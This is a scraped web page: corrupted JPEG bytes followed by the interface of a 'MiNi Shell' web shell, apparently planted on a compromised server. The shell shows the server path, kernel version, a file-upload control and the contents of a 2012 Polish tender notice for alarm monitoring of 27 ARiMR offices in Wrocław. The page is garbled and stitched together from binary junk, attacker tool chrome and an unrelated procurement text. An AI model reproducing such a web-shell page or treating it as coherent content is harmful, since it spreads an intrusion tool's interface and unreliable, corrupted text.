JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120302/64016-N-2012.html

<p class="kh_header"><b>Wrocław: usługa monitoringu i ochrony 27 obiektów Dolnośląskiego Oddziału Regionalnego ARiMR</b><br>
<b>Numer ogłoszenia: 64016 - 2012; data zamieszczenia: 02.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Dolnośląski Oddział Regionalny , ul. Giełdowa 8, 52-438 Wrocław, woj. dolnośląskie, tel. 71 3697400, faks 71 3643702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa monitoringu i ochrony 27 obiektów Dolnośląskiego Oddziału Regionalnego ARiMR.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest całodobowy monitoring systemów alarmowych sygnalizujących włamanie oraz pożar wraz z zapewnieniem interwencji fizycznej w sytuacji otrzymania sygnału alarmowego w 27 obiektach Dolnośląskiego Oddziału Regionalnego ARiMR.
Przedmiot Zamówienia obejmuje w szczególności:
1.	świadczenie usługi monitoringu obiektów Zamawiającego wskazanych w tabeli adresowej,
2.	zapewnienie łączności (urządzenia łącznościowe, tor transmisji oraz sama transmisja danych) lokalnych systemów sygnalizacji włamania oraz pożaru,
3.	zapewnienie obsługi gwarancyjnej w zakresie wykonanych prac w okresie trwania umowy wraz z monitoringiem technicznym i ochronnym istniejących instalacji,
4.	budowę w terminie do 01.04.2012 r. stacji monitorującej (w postaci programu komputerowego) umożliwiającej wgląd do bieżących stanów systemów alarmowych, oraz przeglądanie i generowanie raportów z działania systemów, zlokalizowanej w siedzibie Zamawiającego. W razie przeinstalowywania komputerów Wykonawca zapewnia ponowną aktywację stacji w terminie 3 dni od zgłoszenia.
5.	uruchomienie toru transmisji najpóźniej do 01.04.2012r.,
6.	świadczenie usług w zakresie podejmowania czynności ochronnych przez grupy interwencyjne 
w sytuacji odebrania sygnału alarmowego,
7.	wykonywanie przeglądów technicznych i konserwacyjnych istniejących instalacji alarmowych 
w okresie trwania umowy w cyklu co 6 miesięcy z tym, że pierwszy przegląd powinien zostać wykonany w pierwszym miesiącu po podpisaniu umowy,
8.	prowadzenie dokumentacji dotyczącej przeglądów i konserwacji urządzeń i instalacji alarmowych,
9.	dostarczanie miesięcznych billingów z funkcjonowania systemu antywłamaniowego w poszczególnych jednostkach terenowych do Dolnośląskiego Oddziału Regionalnego ARiMR we Wrocławiu w wersji elektronicznej na wskazany przez Zamawiającego adres email,
2. Wymagania techniczne, jakie spełnia system alarmowy zainstalowany u Zamawiającego i jakie musi spełniać system monitorujący Wykonawcy:
1.	samoczynne dozorowanie linii wejściowych,
2.	precyzyjne lokalizowanie miejsca powstania alarmu,
3.	możliwość oceny stanu technicznego urządzeń,
4.	posiadanie zabezpieczeń antysabotażowych,
5.	posiadanie zasilania awaryjnego ze źródła awaryjnego (podtrzymanie zasilania przez minimum 24 godzin) z samoczynnym przełączeniem w przypadku braku zasilania energetycznego,
6.	sterowanie systemami alarmowymi za pomocą panela (szyfratora) znajdującego się w lokalu,
7.	W każdej lokalizacji wydzielone są strefy. Każda strefa jest i powinna być osobno kontrolowana wraz z rejestracją dostępu za pomocą szyfratora,
8.	testowanie łączności pomiędzy systemem alarmowym a stacją monitorującą u Wykonawcy powinno odbywać się nie rzadziej niż co 5 minut.
9.	przypisanie jednemu z użytkowników uprawnień do tworzenia/usuwania użytkowników systemu oraz nadawania/odbierania praw dostępu do poszczególnych stref w swojej lokalizacji,
3. Wymagania techniczne, jakie muszą spełniać stacje monitorujące (u Wykonawcy i zainstalowana 
w siedzibie Dolnośląskiego Oddziału Regionalnego):
1.	kontrola testów wysyłanych z obiektów, w przypadku opóźnień generowania odpowiedzi,
2.	możliwość generowania raportów poszczególnych systemów alarmowych (data, godzina wystąpienia alarmu włamaniowego i technicznego; data, godzina aktywacji/dezaktywacji systemu/Stefy wraz z danymi użytkownika, czyli kto i kiedy dany obiekt lub daną strefę uzbroił lub rozbroił),
3.	bieżący podgląd stanu systemów alarmowych,
4.	gromadzenie i przechowywanie danych,
5.	możliwość jednoczesnego monitorowania obiektów przez kilka stacji monitorujących 
zgodnie z posiadanymi uprawnieniami,
6.	Wykaz obiektów nieuzbrojonych w danym momencie wraz z uwzględnieniem stref,

DODATKOWE WYMAGANIA:
I.	wymagania techniczne
1.	Tor transmisji pomiędzy systemami alarmowymi, a stacjami monitorującymi zapewnia Wykonawca. Wykonawca zapewnia łączność, przy czym centralki w Biurach Powiatowych i Oddziale Regionalnym muszą zostać wyposażone w nadajniki sygnału. Koszt oferowanej usługi monitoringu powinien zawierać opłaty telekomunikacyjne. 
2.	W przypadku korzystania z łączności GSM, karty SIM muszą być aktywowane na Wykonawcę. Zainstalowana centralka podaje sygnał w protokole zgodnym z powszechnie stosowanymi modemami GPRS.
3.	Usługa monitorowania polegać ma na reagowaniu na zgłoszenia alarmowe i techniczne: - w czasie godzin pracy chronionego obiektu dyspozytor telefonuje pod wskazany numer, sprawdza przyczynę i okoliczności zgłoszenia alarmowego; po godzinach pracy dyspozytor podejmuje działania interwencyjne oraz powiadamia telefonicznie osoby odpowiedzialne wskazane przez Zamawiającego. Zamawiający oczekuję, że czas reakcji grupy interwencyjnej (dojazd do chronionego obiektu, podjęcie działań ochronnych i zabezpieczających) po zgłoszeniu alarmu nie może być dłuższy niż 15 minut w godzinach 600-1800 i 10 minut w godzinach 1800-600. Standardowo do każdego obiektu przypisuje się jedną bezpłatną interwencję w miesiącu (w tym do 30 minut ewentualnego fizycznego chronienia obiektu), przy czym niewykorzystane interwencje (i czasy ochrony) z poszczególnych obiektów mogą być przenoszone między nimi. Po otrzymaniu informacji o podjętych działaniach interwencyjnych, osoby odpowiedzialne, wskazane przez Zamawiającego w poszczególnych lokalizacjach, są zobowiązane w ciągu 30 minut dotrzeć do siedziby Biura Powiatowego celem oceny zaistniałej sytuacji. Wykonawca zobowiązany będzie do dostarczania Zamawiającemu (Dolnośląski Oddział Regionalny) Raportów z każdej interwencji. 
4.	Godziny pracy Zamawiającego zostają wyznaczone na: od 7.00 do 16.00. O każdej zmianie w tym zakresie Wykonawca zostanie z wyprzedzeniem poinformowany przez Zamawiającego. 
5.	Zamawiający zastrzega możliwość czasowego wprowadzenia II zmiany dla pracowników wybranych lokalizacji - praca do 22:00. W przypadku wprowadzenia zmian w godzinach pracy Zamawiający niezwłocznie zawiadomi Wykonawcę.
6.	Zamawiający zastrzega możliwość zmiany lokalizacji obiektu. W przypadku zaistnienia takiej okoliczności Wykonawca zostanie niezwłocznie poinformowany na piśmie. Na wniosek Zamawiającego Wykonawca dokona przeniesienia infrastruktury monitoringu z dotychczasowej siedziby w terminie 3 dni od zgłoszenia (demontaż/montaż detektorów, centralki, programowanie i uruchomienie systemu w nowej lokalizacji). 
7.	Wykonawca zobowiązany jest do zapoznania się z istniejącymi systemami alarmowymi na podstawie dokumentacji technicznej będącej w posiadaniu Zamawiającego lub wizji lokalnej (dotyczy ilości i stanu zainstalowanych czujek, instalacji systemu napadu i włamania).
8.	Wykonawca zobowiązany jest do podłączenia istniejących systemów alarmowych do monitoringu ogólnego. 
9.	Na każde pisemne żądanie Zamawiającego Wykonawca zobowiązany jest do dokonywania zmiany haseł wykorzystywanych do telefonicznego odwoływania alarmu systemu przez uprawnionych przedstawicieli Zamawiającego.
10.	W każdej centrali alarmowej zostanie ustawione to samo hasło serwisowe specyficzne dla ARiMR (po zakończeniu umowy na monitoring, hasło serwisowe zostanie przekazane protokołem do ARiMR).
II.	Wymagania serwisowe
1.	Wykonawca zobowiązany jest do przeprowadzenia dwa razy w roku przeglądu i konserwacji całościowego systemu alarmowego zainstalowanego w danej lokalizacji i przekazania raportu z danego przeglądu do Dolnośląskiego Oddziału Regionalnego. W ramach przeglądu technicznego i konserwacji Wykonawca zobowiązuje się do:
-	sprawdzenia prawidłowości funkcjonowania systemu alarmowego oraz sprawdzenia prawidłowości działania toru transmisji do centrum monitorowania,
-	sprawdzenia ciągłości działania zasilania podstawowego i sprawności zasilania awaryjnego; (wymiana akumulatora w razie stwierdzenia uszkodzenia akumulatora),
-	sprawdzenia poprawności działania akustycznych, optycznych zewnętrznych i wewnętrznych sygnalizatorów alarmowych,
-	sprawdzenia i czyszczenia czujników systemu,
-	sprawdzenia mocowania czujek do podłoża (uchwytów, ścian); szczególnie dotyczy to stref ogólnego i ograniczonego dostępu oraz znajdujących się poza pomieszczeniami Agencji.
2.	Wykonawca przed przystąpieniem do wykonania przeglądu technicznego i konserwacji przedstawi Zamawiającemu harmonogram przeglądów ze wskazaniem terminów i jednostek, w których będą dokonywane przeglądy oraz wskaże osoby wykonujące konserwację (imiona i nazwiska, seria i nr dowodów osobistych)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1, 79.71.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie przez Wykonawcę w/w warunku Zamawiający uzna posiadanie przez Wykonawcę 	koncesji udzielonej przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie 	działalności w zakresie usług ochrony osób i mienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląski Oddział Regionalny ARIMR
ul. Giełdowa 8, 52-438 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2012 godzina 11:00, miejsce: Dolnośląski Oddział Regionalny ARIMR
ul. Giełdowa 8, 52-438 Wrocław
sekretariat, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com